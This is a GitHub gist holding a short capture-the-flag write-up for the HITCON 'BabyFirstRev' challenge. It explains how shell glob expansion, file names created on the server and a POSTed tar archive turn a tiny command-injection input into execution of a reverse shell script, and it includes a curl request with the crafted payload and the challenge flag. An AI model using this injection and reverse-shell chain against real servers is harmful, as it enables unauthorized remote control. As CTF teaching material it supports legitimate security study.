Skip to content

Instantly share code, notes, and snippets.

@pgy

pgy/!writeup.md

Last active November 7, 2017 22:34
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save pgy/2a12632b571456a50676d5e6a095a4d1 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save pgy/2a12632b571456a50676d5e6a095a4d1 to your computer and use it in GitHub Desktop.
Download ZIP
BabyFirstRev writeup
Raw
!writeup.md

BabyFirstRev

tldr: who needs rev when you have tar

Prepare a tar archive like this:

$ mkdir a
$ cat reverse/shell/script > a/s
$ chmod +x a/s
$ tar cf shell.tar a

Create some files for a tar compress command:

>tar
>vcf
>z

POST shell.tar while executing * /t*. PHP stores shell.tar as /tmp/phpRANDOM until the request is finished. Thanks to pathname expansion tar vcf z /tmp is executed:

$ curl -F [email protected] "http://52.199.204.34/?cmd=*%20%2Ft*"

Extract /tmp from the tar archive ./z:

rm v*       # rm vcf
>vxf
*           # tar vxf z

Remove all files but keep ./tmp:

rm *

Rename ./tmp to ./xf and create an empty file called tar:

>mv
* xf        # mv tmp xf
rm mv
>tar

Now the directory tree is:

./tar
./xf
./xf/phpRANDOM  # our shell.tar file

Extract reverse shell script and execute it:

* */*       # tar xf xf/phpRANDOM
a/s

hitcon{idea_from_phith0n,thank_you:)}

No, we did not compress and download /. Not even once.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment